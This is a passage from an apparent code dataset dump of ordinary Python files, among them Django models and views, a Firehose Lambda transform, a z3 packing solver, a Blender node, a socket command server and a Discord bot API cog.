'create_images_on_demand': False,\n    'image_key_post_processor': None,\n    'progressive_jpeg': True\n}\n\nVERSATILEIMAGEFIELD_USE_PLACEHOLDIT = True\nVERSATILEIMAGEFIELD_RENDITION_KEY_SETS = {\n    'profile_avatar': [\n        ('full_size', 'url'),\n        ('crop__400x400', 'crop__400x400'),\n        ('crop__280x280', 'crop__280x280'),\n        ('crop__128x128', 'crop__128x128'),\n        ('crop__44x44', 'crop__44x44'),\n        ('crop__42x42', 'crop__42x42'),\n    ],\n    'logo': [\n        ('full_size', 'url'),\n        ('crop__400x400', 'crop__400x400'),\n        ('crop__280x280', 'crop__280x280'),\n        ('crop__128x128', 'crop__128x128'),\n        ('crop__44x44', 'crop__44x44'),\n        ('crop__42x42', 'crop__42x42'),\n    ]\n}\n","sub_path":"cambasBlog/settings/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"625764185","text":"# -*- coding: utf-8 -*-\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.formats import number_format\n\nuf_list = (\n    ('AC', 'Acre'),\n    ('AL', 'Alagoas'),\n    ('AM', 'Amazonas'),\n    ('AP', u'Amapá'),\n    ('BA', 'Bahia'),\n    ('CE', u'Ceará'),\n    ('DF', u'Brasília'),\n    ('ES', u'Espírito Santo'),\n    ('GO', u'Goiás'),\n    ('MA', u'Maranhão'),\n    ('MG', 'Minas Gerais'),\n    ('MS', 'Mato Grosso do Sul'),\n    ('MT', 'Mato Grosso'),\n    ('PA', u'Pará'),\n    ('PB', u'Paraíba'),\n    ('PE', 'Pernambuco'),\n    ('PI', u'Piauí'),\n    ('PR', u'Paraná'),\n    ('RJ', 'Rio de Janeiro'),\n    ('RN', 'Rio Grande do Norte'),\n    ('RO', u'Rondônia'),\n    ('RR', 'Roraima'),\n    ('RS', 'Rio Grande do Sul'),\n    ('SC', 'Santa Catarina'),\n    ('SE', 'Sergipe'),\n    ('SP', u'São Paulo'),\n    ('TO', 'Tocantins'),\n)\n\n\nclass TimeStampedModel(models.Model):\n    created_at = models.DateTimeField(\n        _('criado em'), auto_now_add=True, auto_now=False)\n    modified_at = models.DateTimeField(\n        _('modificado em'), auto_now_add=False, auto_now=True)\n\n    class Meta:\n        abstract = True\n\n\nclass Company(TimeStampedModel):\n    name = models.CharField(_('nome'), max_length=30)\n    cnpj = models.CharField(_('CNPJ'), max_length=19, unique=True)\n    ie = models.CharField(_('IE'), max_length=15, blank=True)\n    address = models.CharField(_(u'endereço'), max_length=80, blank=True)\n    address_number = models.PositiveIntegerField(_(u'número'), blank=True)\n    district = models.CharField(_('bairro'), max_length=80, blank=True)\n    city = models.ForeignKey(\n        'City', related_name='company_city', verbose_name=_('cidade'))\n    uf = models.CharField(_('UF'), max_length=2, choices=uf_list)\n    cep = models.CharField(_('CEP'), max_length=9, blank=True)\n    person = models.ForeignKey(\n        'Person', related_name='company_person', verbose_name=_('contato'), blank=True)\n\n    class Meta:\n        ordering = ['name']\n        verbose_name = \"empresa\"\n        verbose_name_plural = \"empresas\"\n\n    def __str__(self):\n        return \" \".join([self.name, self.cnpj])\n\n    def get_company_detail_url(self):\n        return u\"/companys/%i\" % self.id\n\n\nclass City(models.Model):\n    city = models.CharField(_('cidade'), max_length=80)\n    uf = models.CharField(_('UF'), max_length=2, choices=uf_list)\n\n    class Meta:\n        ordering = ['city']\n        verbose_name = \"cidade\"\n        verbose_name_plural = \"cidades\"\n\n    def __str__(self):\n        return self.city\n\n\nclass Person(TimeStampedModel):\n    firstname = models.CharField(_('nome'), max_length=30)\n    lastname = models.CharField(_('sobrenome'), max_length=30)\n    email = models.EmailField(_('e-mail'))\n    phone = models.CharField(_('fone'), max_length=18)\n\n    class Meta:\n        ordering = ['firstname']\n        verbose_name = \"pessoa\"\n        verbose_name_plural = \"pessoas\"\n\n    def __str__(self):\n        return u\"%s %s\" % (self.firstname, self.lastname)\n    full_name = property(__str__)\n","sub_path":"myproject/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"474535482","text":"#!/usr/bin/python\n\n#  Tkinter tutorial\n#\n\nfrom Tkinter import *\n\nroot = Tk()\nroot.title('Basic Text')\n\ncw  =   200\nch  =   20\n\ncanvas1=Canvas(root,width=cw,height=ch,background='white')\ncanvas1.grid(row=0,column=1)\n\nxy = 120,10\n\ncanvas1.create_text(xy,text='This is just test for text')\n\nroot.mainloop()\n","sub_path":"tkinter/text_using_tkinter.py","file_name":"text_using_tkinter.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"559043432","text":"import json\nimport base64\nimport traceback\nfrom datetime import datetime\n\ndef handler(event, context):\n    output = []\n    for record in event[\"records\"]:\n        try:\n            # Base64 decode record data and JSON parse data\n            entry = base64.b64decode(record[\"data\"]).decode(\"utf-8\")\n            parsed_entry = json.loads(entry)\n            payload = parsed_entry[\"detail\"][\"data\"]\n            payload[\"timestamp\"] = payload[\"date\"]\n            del payload[\"date\"]\n            payload[\"details\"] = json.dumps(payload[\"details\"])\n            \n            # Add new line to payload string, Base64 encode payload and return transformed record\n            decoded_data = json.dumps(payload) + \"\\n\"\n            encoded_data = base64.b64encode(decoded_data.encode(\"utf-8\")).decode(\"utf-8\")\n            output.append({\n                \"recordId\": record[\"recordId\"],\n                \"result\": \"Ok\",\n                \"data\": encoded_data,\n            })\n        except:\n            # If an error occurs, print error and return record as having failed processing\n            traceback.print_exc()\n            output.append({\n                \"recordId\": record[\"recordId\"],\n                \"result\": \"ProcessingFailed\",\n                \"data\": record[\"data\"],\n            })\n    return {\n        \"records\": output\n    }","sub_path":"lambdas/firehose-transform/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"202470554","text":"import _thread\nimport youtube_dl\n\n\nclass PlayerPlaylist:\n    def __init__(self, channel, voice_client, source):\n        self.channel = channel\n        self.voice_client = voice_client\n        self.source = source\n        self.urls = []\n        self.completed = False\n        self.youtube_dl_options = dict(\n            ignoreerrors=True,\n            noplaylist=False,\n            default_search=\"auto\",\n            quiet=True,\n            nocheckcertificate=True,\n            abortonerror=False\n        )\n        try:\n            _thread.start_new_thread(self.download_playlist_info, ())\n        except Exception as e:\n            print(e)\n            pass\n\n    def download_playlist_info(self):\n        with youtube_dl.YoutubeDL(self.youtube_dl_options) as ytdl:\n            ytdl_playlist = ytdl.extract_info(self.source, download=False)\n        for video in ytdl_playlist['entries']:\n            if video is not None:\n                self.urls.append(video['webpage_url'])\n        self.completed = True\n","sub_path":"PlayerPlaylist.py","file_name":"PlayerPlaylist.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"166463739","text":"#!/usr/bin/env python\n\nimport os\nimport argparse\nimport time\nfrom z3 import *\nfrom itertools import combinations\nfrom typing import Sequence\n\n\n# Cumulative constraint\ndef cumulative(solver, S: Sequence, D: Sequence, R: Sequence, C: int):\n    # Iterate over the durations\n    for u in D:\n        solver.add(\n            Sum(\n                [If(And(S[i] <= u, u < S[i] + D[i]), R[i], 0) for i in range(len(S))]\n            ) <= C)\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"-i\", \"--in_path\", help=\"Path to the file constaining the input instance\", required=True, type=str)\n    parser.add_argument(\"-o\", \"--out_path\", help=\"Path to the directory that will contain the output solution\", required=True, type=str)\n    parser.add_argument(\"-t\", \"--timeout\", help=\"Timeout in seconds (300 by default)\", required=False, type=int)\n    parser.add_argument(\"-ic\", \"--implied\", help=\"Don't use implied constraints (they're used by default)\", action='store_false')\n    args = parser.parse_args()\n    \n    # Read the input instance\n    input_filename = args.in_path\n    w, h, n, DX, DY = None, None, None, None, None\n    with open(input_filename, 'r') as f_in:\n        lines = f_in.read().splitlines()\n\n        split = lines[0].split(' ')\n        w = int(split[0])\n        h = int(split[1])\n\n        n = int(lines[1])\n\n        DX = []\n        DY = []\n\n        for i in range(int(n)):\n            split = lines[i + 2].split(' ')\n            DX.append(int(split[0]))\n            DY.append(int(split[1]))\n\n    # Define solver and base model\n    solver = Solver()\n    XY = [(Int(f'XY_{i}_0'), Int(f'XY_{i}_1')) for i in range(n)]\n\n    # Define auxiliary variables\n    R = [Bool(f'R_{i}') for i in range(n)]  # rotation\n    TRUE_DX = [If(And(DX[i] != DY[i], R[i]), DY[i], DX[i]) for i in range(n)]  # actual X dimension\n    TRUE_DY = [If(And(DX[i] != DY[i], R[i]), DX[i], DY[i]) for i in range(n)]  # actual Y dimension\n\n    print('Adding constraints...')\n\n    # Non-overlapping constraint\n    for (i, j) in combinations(range(n), 2):\n        solver.add(Or(XY[i][0] + TRUE_DX[i] <= XY[j][0], \n                    XY[j][0] + TRUE_DX[j] <= XY[i][0],\n                    XY[i][1] + TRUE_DY[i] <= XY[j][1],\n                    XY[j][1] + TRUE_DY[j] <= XY[i][1]))\n\n    # Boundaries consistency constraint\n    for i in range(n):\n        solver.add(XY[i][0] >=0)\n        solver.add(XY[i][1] >= 0)\n        solver.add(XY[i][0] + TRUE_DX[i] <= w)\n        solver.add(XY[i][1] + TRUE_DY[i] <= h)\n\n    if args.implied:\n        # Implied constraints\n        cumulative(solver,\n                S=list(map(lambda t: t[0], XY)),  # take x coordinates\n                D=TRUE_DX,\n                R=TRUE_DY,\n                C=h)\n        cumulative(solver,\n                S=list(map(lambda t: t[1], XY)),  # take y coordinates\n                D=TRUE_DY,\n                R=TRUE_DX,\n                C=w)\n    else:\n        print('Implied constraints disabled.')\n\n    # Set timeout for solver (in msec)\n    timeout = args.timeout * 1000 if args.timeout is not None else 300000\n    solver.set('timeout', timeout)\n\n    print('Checking the model...')\n    start_time = time.time()\n    res = solver.check()\n    elapsed_time = time.time() - start_time\n    print(f'Elapsed: {elapsed_time:.3f} s')\n\n    if res == sat:\n        print('The instance is SAT.')\n        model = solver.model()\n\n        xy = 
[(model[XY[i][0]], model[XY[i][1]]) for i in range(n)]\n        r = [model[R[i]] for i in range(n)]\n\n        # Write solution to file\n        instance_name = input_filename.split('/')[-1]\n        instance_name = instance_name[:len(instance_name) - 4]\n        output_filename = os.path.join(args.out_path, instance_name + '-out.txt')\n        with open(output_filename, 'w') as f_out:\n            f_out.write(f'{w} {h}\\n')\n            f_out.write(f'{n}\\n')\n            for i in range(n):\n                f_out.write(f'{DY[i] if r[i] else DX[i]} {DX[i] if r[i] else DY[i]}\\t{xy[i][0]} {xy[i][1]}\\n')\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"SMT/src/pwp-rotation.py","file_name":"pwp-rotation.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"177263563","text":"import unittest\nfrom here.geocoder import *\nimport requests_mock\n\n\nclass TestGeocoder(unittest.TestCase):\n    @requests_mock.mock()\n    def test_geocode(self, m):\n        geocoder = Geocoder()\n\n        test_address = \"AV ANTONIO MUNHOZ BONILHA, 132, Sao Paulo, Brasil\"\n\n        endpoint = geocoder.geocode_url + \"?app_id={0}&app_code={1}&gen={2}&searchtext={3}\" \\\n            .format(geocoder.app_id,\n                    geocoder.app_code,\n                    9,\n                    test_address)\n\n        m.get(endpoint,\n              content=open('here/tests/data/geocoder.json').read())\n\n        self.assertEqual(geocoder.geocode(test_address), (-23.50286, -46.68465))\n","sub_path":"here/tests/test_geocoder.py","file_name":"test_geocoder.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"511365377","text":"import bpy, colorsys\nfrom bpy.props import *\nfrom ... events import executionCodeChanged\nfrom ... base_types.node import AnimationNode\n\n# using linear conversion here, unlike BL colorpicker hsv/hex\n# BL Color() funcion does this also and has only rgb+hsv, so we'l use colorsys\n# only hsv/hex in the colorpicker are gamma corrected for colorspaces\n# we shall not use other functions, till they are in context (BL color space)\n\ntargetTypeItems = [\n    (\"RGB\", \"RGB\", \"Red, Green, Blue\"),            \n    (\"HSV\", \"HSV\", \"Hue, Saturation, Value\"),      \n    (\"HSL\", \"HSL\", \"Hue, Saturation, Lightness\"),  \n    (\"YIQ\", \"YIQ\", \"Luma, Chrominance\")]           \n\nclass SeparateColorNode(bpy.types.Node, AnimationNode):\n    bl_idname = \"an_SeparateColorNode\"\n    bl_label = \"Separate Color\"\n    \n    def targetTypeChanged(self, context):\n        self.updateHideStatus()\n        executionCodeChanged()\n        \n    targetType = EnumProperty(name = \"Target Type\", items = targetTypeItems,\n                                    default = \"RGB\", update = targetTypeChanged)\n\n    def create(self):\n        self.inputs.new(\"an_ColorSocket\", \"Color\", \"color\")\n        \n        self.outputs.new(\"an_FloatSocket\", \"Red\", \"r\")\n        self.outputs.new(\"an_FloatSocket\", \"Green\", \"g\")\n        self.outputs.new(\"an_FloatSocket\", \"Blue\", \"b\")\n        \n        self.outputs.new(\"an_FloatSocket\", \"Hue\", \"h\")\n        self.outputs.new(\"an_FloatSocket\", \"Saturation\", \"s\")\n        self.outputs.new(\"an_FloatSocket\", \"Value\", \"v\")\n        \n        #same H, S (attention HLS/HSL order! using HSL for sockets, but function does hls)\n        self.outputs.new(\"an_FloatSocket\", \"Lightness\", \"l\")\n        \n        self.outputs.new(\"an_FloatSocket\", \"Y Luma\", \"y\")\n        self.outputs.new(\"an_FloatSocket\", \"I In phase\", \"i\")\n        self.outputs.new(\"an_FloatSocket\", \"Q Quadrature\", \"q\")\n        \n        self.outputs.new(\"an_FloatSocket\", \"Alpha\", \"alpha\")\n        self.updateHideStatus()\n        \n    def draw(self, layout):\n        layout.prop(self, \"targetType\", expand = True)\n        \n    def drawLabel(self):\n        return \"--> \" + self.targetType + \"a (Linear)\"\n    \n    def getExecutionCode(self):\n        yield \"r = g = b = h = s = v = l = y = i = q = 0\"\n        if self.targetType == \"RGB\":    yield \"r, g, b = color[0], color[1], color[2]\"\n        elif self.targetType == \"HSV\":  yield \"h, s, v = colorsys.rgb_to_hsv(color[0], color[1], color[2])\"\n        elif self.targetType == \"HSL\":  yield \"h, l, s = colorsys.rgb_to_hls(color[0], color[1], color[2])\"#attention to the HLS order!\n        elif self.targetType == \"YIQ\":  yield \"y, i, q = colorsys.rgb_to_yiq(color[0], color[1], color[2])\"\n        yield \"alpha = color[3]\"\n    \n    def getUsedModules(self):\n        return [\"colorsys\"]\n\n    def updateHideStatus(self):\n        for socket in self.outputs[:-1]: socket.hide = True\n\n        if self.targetType == \"RGB\":\n            self.outputs[\"Red\"].hide = False\n            self.outputs[\"Green\"].hide = False\n            self.outputs[\"Blue\"].hide = False\n        elif self.targetType == \"HSV\":\n            self.outputs[\"Hue\"].hide = False\n            self.outputs[\"Saturation\"].hide = False\n            self.outputs[\"Value\"].hide = False\n        elif self.targetType == \"HSL\":\n            
self.outputs[\"Hue\"].hide = False\n            self.outputs[\"Saturation\"].hide = False\n            self.outputs[\"Lightness\"].hide = False\n        elif self.targetType == \"YIQ\":\n            self.outputs[\"Y Luma\"].hide = False\n            self.outputs[\"I In phase\"].hide = False\n            self.outputs[\"Q Quadrature\"].hide = False\n","sub_path":"nodes/color/separate_color.py","file_name":"separate_color.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"343341864","text":"import socket, sys\nfrom Framework.Client import *\nfrom Framework.Execution import *\n\n\nclass Server(object):\n    def __init__(self, hostname, port, path=\"bin/\", max_capacity=10, connect_buffer=2, connection_timeout=0.01):\n        self.hostname = hostname\n        self.port = port\n        self.path = path\n        self.max_capacity = max_capacity\n        self.connect_buffer = connect_buffer\n        self.connection_timeout = connection_timeout\n        self.socket = None\n        self.clients = []\n        self.alive = True\n        self.permissions = ROOT\n\n        try:\n            startup_commands = open(self.path + 'startup.txt').readlines()\n            for command in startup_commands:\n                args = command.replace('\\n', '').split(' ')\n                print(run_command(self, self, args[0], args[1:]))\n        except FileNotFoundError:\n            print('No startup file detected!')\n\n    def start(self):\n        try:\n            self.socket = socket.socket()\n            self.socket.setblocking(True)\n            self.socket.settimeout(self.connection_timeout)\n            self.socket.bind((self.hostname, self.port))\n            self.socket.listen(self.connect_buffer)\n        except OSError:\n            print('Operating System Error')\n            sys.exit(1)\n\n        self.run()\n\n    def run(self):\n        while self.alive:\n            try:  # Checks for any clients waiting to connect\n                if len(self.clients) < self.max_capacity:\n                    conn, addr = self.socket.accept()\n                    print(\"Connection from\", addr)\n                    conn.settimeout(self.connection_timeout)\n                    client = Client(conn, addr)\n                    self.clients.append(client)\n            except TimeoutError:\n                pass\n            except OSError:\n                pass\n\n            delete_list = []\n            for client in self.clients:\n                data = b''\n                success = False\n                while True:\n                    try:\n                        data += client.recv(4096)\n                        success = True\n                    except ConnectionError:\n                        delete_list.append(client)\n                        client.disconnect()\n                        print(\"Disconnection by\", client.addr)\n                        success = False\n                        break\n                    except socket.timeout:\n                        break\n\n                data = data.decode()\n                if success:\n                    print(client.get_name() + ': ' + data)\n                    data = data.split(' ')\n                    reply = run_command(self, client, data[0], data[1:])\n                    client.send(reply.encode())\n\n            for client in delete_list:\n                self.clients.remove(client)\n\n    def send(self, client, data):\n        client.send(data)\n\n    def send_to_all(self, data):\n        for client in self.clients:\n            client.send(data)\n\n    def get_permissions(self):\n        return self.permissions\n\n    def get_name(self):\n        return '[Server]'\n\n    def shutdown(self):\n        for client in self.clients:\n            client.disconnect()\n        self.alive = False\n","sub_path":"ges/GCEServer.py","file_name":"GCEServer.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"312018197","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Sum\nfrom django.contrib.auth.models import User\nfrom .models import UserProfile\nfrom .forms import UserProfileForm\n\nfrom blog.models import Post\nfrom recipes.models import Recipe\n\nfrom checkout.models import Order\n\n\n@login_required\ndef profile(request):\n    \"\"\" Display the user's profile \"\"\"\n\n    profile = get_object_or_404(UserProfile, user=request.user)\n    user = get_object_or_404(User, id=request.user.id)\n    posts = Post.objects.all()\n    recipes = Recipe.objects.all()\n\n    if request.method == 'POST':\n        form = UserProfileForm(request.POST, instance=profile)\n        if form.is_valid():\n            form.save()\n            messages.success(request, 'Profile successfully updated!')\n        else:\n            messages.error(request, 'Update failed. Please ensure \\\n                the form is valid.')\n\n    # Populate the form with the user's profile info\n    else:\n        form = UserProfileForm(instance=profile)\n    orders = profile.orders.all().order_by('-pk')\n    user_posts = user.blog_posts.all().order_by('-pk')\n\n    # See all my recipes by vote count first, then newest to oldest\n    user_recipes = user.recipe_posts.all().order_by('-vote_count', '-pk')\n\n    # Get number of votes for the user's published recipes\n    all_votes = user_recipes.aggregate(num_votes=Sum(\n                                       'vote_count')).get('num_votes')\n    template = 'profiles/profile.html'\n    context = {\n        'form': form,\n        'orders': orders,\n        'on_profile_page': True,\n        'posts': posts,\n        'recipes': recipes,\n        'user_posts': user_posts,\n        'user_recipes': user_recipes,\n        'all_votes': all_votes,\n    }\n\n    return render(request, template, context)\n\n\ndef order_history(request, order_number):\n    order = get_object_or_404(Order, order_number=order_number)\n    posts = Post.objects.all().order_by('-pk')\n    recipes = Recipe.objects.all().order_by('-pk')\n\n    messages.warning(request, (\n        f'This is a past confirmation for order number {order_number}.'\n        'A confirmation email was sent on the order date.'\n    ))\n    template = 'checkout/checkout_success.html'\n    context = {\n        'order': order,\n        'posts': posts,\n        'recipes': recipes,\n        'from_profile': True,\n    }\n\n    return render(request, template, context)\n","sub_path":"profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"476909938","text":"\"\"\"\nCreates a benchmark by predicting the most popular skus in each category\n\"\"\"\n\nfrom collections import defaultdict\nimport csv\n\nwd = \"../../data/downloaded/small/\"\n\ndef get_popular_skus():\n    \"\"\"Returns a dictionary of the most popular skus in each category\"\"\"\n    with open(wd + \"train.csv\") as infile:\n        reader = csv.reader(infile, delimiter=\",\")\n        reader.next() # burn the header\n\n        categories = defaultdict(lambda: defaultdict(int))\n        for (user, sku, category, query, click_time, query_time) in reader:\n            categories[category][sku] += 1\n\n        for category in categories:\n            categories[category] = sorted(categories[category].items(), \\\n                                          key=lambda x: x[1])\n            categories[category].reverse()\n        return categories\n\ndef make_predictions(categories):\n    \"\"\"Write the predictions out\"\"\"\n    with open(wd + \"test.csv\") as infile:\n        reader = csv.reader(infile, delimiter=\",\")\n        reader.next() # burn the header\n        with open(\"popular_skus.csv\", \"w\") as outfile:\n            writer = csv.writer(outfile, delimiter=\",\")\n            writer.writerow([\"sku\"])\n            for (user, category, query, click_time, query_time) in reader:\n                try:\n                    guesses = [x[0] for x in categories[category][0:5]]\n                    writer.writerow([\" \".join(guesses)])\n                except TypeError: # a category we haven't seen before\n                    writer.writerow([\"0\"])\n\ndef main():\n    \"\"\"Creates the benchmark\"\"\"\n    categories = get_popular_skus()\n    make_predictions(categories)\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"popular_skus.py","file_name":"popular_skus.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"254952127","text":"import secrets\nfrom datetime import timedelta\nfrom typing import List\n\nfrom discord.ext.commands import Cog, Context\nimport discord\n\nfrom src.user_command import UserCommand, VaguePatternError, LongResponseException, ShortTriggerException\nfrom src.user_command import ResponseKeywordException, DuplicatedTriggerException, update_command\nfrom lib.status_codes import StatusCodes as sc\nfrom lib.config import logger\nfrom src.api.util import fetch_guild\nfrom src.api.mock_discord import MockMember, MockMessage, LogActions\n\n\nclass Api(Cog):\n\n    def __init__(self, bot):\n        self.bot = bot\n        self.fake_messages = {}\n\n    async def api_entry(self, method_name, *args, **kwargs):\n        \"\"\"Callback method for the rpc server\n\n        :param method_name: name of the method to execute\n        :param *args: args to pass through\n        :param **kwargs: kwargs to pass through\n        \"\"\"\n        try:\n            assert not method_name.startswith('_')\n            method = getattr(self, method_name)\n        except (AttributeError, AssertionError):\n            logger.warning(f\"Someone tried to call '{method}' but it doesn't exist (or is private)\")\n            return {\"message\": \"No such method\"}, sc.NOT_FOUND_404\n\n        try:\n            return await method(*args, **kwargs)\n        except Exception as e:\n            logger.exception(f\"caught exception while handling remote request\")\n            return {\"message\": f\"'{e}'\"}, sc.INTERNAL_SERVER_ERROR_500\n\n    async def ping(self):\n        return {'message': 'pong'}, sc.OK_200\n\n    async def guild_count(self):\n        return await self.bot.manager_client.guild_count()\n\n    async def set_response(self, user_id, guild_id, trigger, response):\n        guild = self.bot.get_guild(int(guild_id))\n        try:\n            command = UserCommand(self.bot.session, self.bot, trigger, response, 0, guild, user_id, new=True)\n        except VaguePatternError:\n            msg = \"Capture group too broad.\"\n            code = sc.NOT_ACCEPTABLE_406\n        except LongResponseException:\n            msg = \"Response is too long.\"\n            code = sc.PAYLOAD_TOO_LARGE_413\n        except ShortTriggerException:\n            msg = \"Trigger is too short.\"\n            code = sc.LENGTH_REQUIRED_411\n        except ResponseKeywordException:\n            msg = \"That response is protected, please use another.\"\n            code = sc.NOT_ACCEPTABLE_406\n        except DuplicatedTriggerException:\n            msg = \"Remove duplicated trigger first.\"\n            code = sc.CONFLICT_409\n        else:\n            self.bot.user_commands[guild_id].append(command)\n            msg = 'Successfully Set'\n            code = sc.OK_200\n        return {'message': msg}, code\n\n    async def is_member(self, user_id, guild_id, admin=False):\n        '''check if user is a member or admin of the given guild'''\n        guild = self.bot.get_guild(int(guild_id))\n        if not guild:\n            return {'member': False}, sc.OK_200\n        settings = self.bot.settings[guild]\n        return {\n            'member': bool(guild.get_member(int(user_id))) and (not admin or int(user_id) in settings.admins_ids)\n        }, sc.OK_200\n\n    async def get_permissions(self, user_id: int, guild_id: int):\n        guild = self.bot.get_guild(int(guild_id))\n        settings = self.bot.settings[guild]\n        default = not guild or not settings and user_id not in settings.admin_ids\n        
return {'permissions': 274 if default else 65535}\n\n    async def delete_response(self, user_id, guild_id, trigger):\n        guild = self.bot.get_guild(int(guild_id))\n\n        for oldcommand in self.bot.user_commands[guild_id]:\n            if oldcommand.raw_trigger == oldcommand.filter_trigger(trigger):\n                if oldcommand.author_id == user_id or user_id in self.bot.settings[guild].admin_ids:\n                    self.bot.user_commands[guild_id].remove(oldcommand)\n                    update_command(self.bot.session, oldcommand.raw_trigger, '', 0, guild, user_id, delete=True)\n                    return {'message': \"Successfully Deleted\"}, sc.OK_200\n                else:\n                    return {'message': \"Not authorized\"}, sc.UNAUTHORIZED_401\n        return {'message': \"No such command.\"}, sc.NOT_FOUND_404\n\n    async def fetch_user_dict(self, id):\n        usr = self.bot.get_user(int(id))\n        if usr is None:\n            return {'message': \"No such user\"}, sc.NOT_FOUND_404\n        return {\n            'name': usr.name,\n            'avatar': usr.avatar,\n            'discriminator': usr.discriminator\n        }, sc.OK_200\n\n    async def get_emoji(self, id):\n        e = self.bot.get_emoji(int(id))\n        if e is None:\n            return {'message': \"No such emoji\"}, sc.NOT_FOUND_404\n        return {\n            'name': e.name,\n            'url': str(e.url)\n        }, sc.OK_200\n\n    async def get_extensions(self):\n        return {'extensions': [k for k in self.bot.extensions.keys()]}, sc.OK_200\n\n    async def reload_extension(self, extension_name):\n        name = extension_name.replace('-', '.')\n        try:\n            self.bot.reload_extension(name)\n        except discord.ext.commands.errors.ExtensionNotLoaded as e:\n            logger.exception(\"Couldn't load extension\")\n            return {\"message\": f\"Extension Not Loaded: {e}\"}, sc.SERVICE_UNAVAILABLE_503\n        return {\"message\": \"Reload signal sent\"}, sc.OK_200\n\n    @fetch_guild\n    async def bin_messages(self, guild):\n        stats_cog = self.bot.cogs[\"Server Statistics\"]\n        members, channels, times = stats_cog.bin_messages(guild, timedelta(minutes=5))\n        return {\n            'total': len(stats_cog.cache[guild.id]),\n            'members': members,\n            'channels': channels,\n            'times': times,\n        }, sc.OK_200\n\n    @fetch_guild\n    async def get_guild_data(self, guild):\n        return {\n            'name': guild.name,\n            'member_count': guild.member_count,\n        }, sc.OK_200\n\n    @fetch_guild\n    async def settings_access(self, guild, setting=None, value=None):\n        settings = self.bot.settings[guild]\n        if hasattr(settings, setting):\n            return {'value': getattr(settings, setting)}, sc.OK_200\n        return {'value': \"unknown setting\"}, sc.NOT_FOUND_404\n\n    async def tag_autbot_guilds(self, guild_list, user_id: int):\n        all_guilds, _ = await self.bot.manager_client.all_guilds()\n        for guild_dict in guild_list:\n            for guild in all_guilds:\n                if str(guild['id']) == guild_dict['id']:\n                    guild_dict['has_architus'] = True\n                    guild_dict['architus_admin'] = user_id in guild['admin_ids']\n                    break\n            else:\n                guild_dict.update({'has_architus': False, 'architus_admin': False})\n        return {'guilds': guild_list}, sc.OK_200\n\n    async def handle_mock_user_action(\n  
          self,\n            action: int = None,\n            messageId: int = None,\n            guildId: int = None,\n            content: str = None,\n            allowedCommands: List[str] = (),\n            emoji: str = None,\n            silent: bool = False):\n\n        message_id = messageId\n        guild_id = guildId\n        allowed_commands = allowedCommands\n\n        # this is very scuffed. guilds under this number won't have their responses added to the db\n        assert guild_id < 10000000\n\n        if action is None or message_id is None or guild_id is None:\n            return {'message': \"missing arguments\"}, sc.BAD_REQUEST_400\n\n        sends = []\n        reactions = []\n        self.fake_messages.setdefault(guild_id, {})\n        resp_id = secrets.randbits(24) | 1\n\n        if action == LogActions.MESSAGE_SEND:\n            args = content.split()\n\n            # intersection of commands that exist and commands they're allowed to see\n            possible_commands = [cmd for cmd in self.bot.commands if cmd.name in allowed_commands]\n\n            # check if they triggered help command\n            if args[0][1:] == 'help':\n                help_text = ''\n                for cmd in possible_commands:\n                    try:\n                        if args[1] in cmd.aliases or args[1] == cmd.name:\n                            help_text += f'```hi{args[1]} - {cmd.help}```'\n                            break\n                    except IndexError:\n                        help_text += f'```{cmd.name}: {cmd.help:>5}```\\n'\n\n                sends.append(help_text)\n            else:\n                # check if they triggered a builtin command\n                triggered_command = None\n                for cmd in possible_commands:\n                    if args[0][1:] in cmd.aliases + [cmd.name]:\n                        triggered_command = cmd\n                        break\n\n                mock_message = MockMessage(self.bot, message_id, sends, reactions, guild_id, content=content,\n                                           resp_id=resp_id)\n                self.fake_messages[guild_id][message_id] = mock_message\n\n                self.bot.user_commands.setdefault(int(guild_id), [])\n                if triggered_command:\n                    # found builtin command, creating fake context\n                    ctx = Context(**{\n                        'message': mock_message,\n                        'bot': self.bot,\n                        'args': args[1:],\n                        'prefix': content[0],\n                        'command': triggered_command,\n                        'invoked_with': args[0]\n                    })\n                    # override send, so ctx sends go to our list\n                    ctx.send = lambda content: sends.append(content)\n                    await ctx.invoke(triggered_command, *args[1:])\n                else:\n                    # no builtin, check for user set commands in this \"guild\"\n                    for command in self.bot.user_commands[mock_message.guild.id]:\n                        if command.triggered(mock_message.content):\n                            await command.execute(mock_message)\n                            break\n\n            # Prevent response sending for silent requests\n            if silent or not sends:\n                sends = ()\n                resp_id = None\n            else:\n                mock_message = MockMessage(self.bot, resp_id, sends, reactions, guild_id, 
